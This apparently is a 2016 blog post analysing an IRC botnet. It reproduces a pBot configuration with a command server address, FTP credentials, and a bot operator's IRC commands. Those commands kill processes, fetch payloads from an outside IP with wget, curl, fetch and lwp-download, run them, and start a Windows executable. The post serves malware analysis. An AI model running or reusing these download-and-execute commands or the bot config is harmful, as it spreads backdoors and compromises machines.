Pages

Saturday, December 10, 2016

IRC - drona.bot.nu - Botnet



Spreading ftp server : 
ft*://kobra:kobra@195.234.176.57/
bot config ////////pbot.php////////
class pBot
{
    var $config = array("server" => "112.124.47.140", "port" => "2222", "pass" => "", 
"prefix" => "NOU", "maxrand" => "6", "chan" => "#pma", "chan2" => "#pma2", 
"key" => "NEW", "modes" => "+pwisx", "password" => "123", "trigger" => ".", 
"hostauth" => "ANONYMOUS.XYZ", "limit" => "300" 
        );
/////////end//////////
 


Also first no dns at this poit to prevent suspending but soon as the new infected machine joins IRC auto msg from user "w" whith an
mrc script commands the bot to download new bot file :


Here the msg from "w"

[20:59] <w> .user ro
[20:59] <w> .uname
[20:59] <w> .exec killall -9 perl
[20:59] <w> .exec cd /tmp/;wget ***://user:ggallery@66.71.191.82/a.pdf ; 
curl -O f*p://user:ggallery@66.71.191.82/a.pdf ; 
fetch f*p://user:ggallery@66.71.191.82/a.pdf ; 
lwp-download ftp://user:ggallery@66.71.191.82/a.pdf ; perl a.pdf ; rm -rf a.*
[20:59] <w> .exec cd /dev/shm/;wget ***://user:ggallery@66.71.191.82/drn.tgz;tar xvf drn.tgz;rm -rf drn.tgz;cd .p;
./autorun;./run;
[20:59] <w> .download *****/lewl.ucoz.site/sexy.exe D:\sexy.exe
[20:59] <w> .exec start sexy.exe
[20:59] <w> .download ****//lewl.ucoz.site/sexy.exe C:\sexy.exe
[20:59] <w> .exec start D:\sexy.exe
[20:59] <w> .exec start C:\sexy.exe
[20:59] <w> .exec del sexy.exe C:\sexy.exe
[20:59] <w> .exec rm -rf sexy.exe C:\sexy.exe perl*
[20:59] <w> .exec cd /dev/shm ;wget f***://user:ggallery@66.71.191.82/drn.tgz;tar xvf drn.tgz;rm -rf drn.tgz;cd .p;./run;
[20:59] <w> .start D:\sexy.exe
[20:59] <w> .start C:\sexy.exe
[20:59] <w> .die
 


Also lets check ftp : 3 files
  • a.pdf // new bot whith the dns
  • drn.tgz // Linux backdoor and irc bot
  • gscan.tgz // His personal ZeMu setup

And in a.pdf we see hes real dns and one photo down too




// Dont download if u dont know what u doing .... drn.tgz : Sample
 And Sexy.exe is a irc bot to mIRC base , packed as a SFX arschive
some files : 


And some other things found on his ftp  , a yeah he fortgot to give limited access to that ftp user or just dumb to user anonymous user ... anyways all his shit rm -f * . If someone interested in this shit just email me :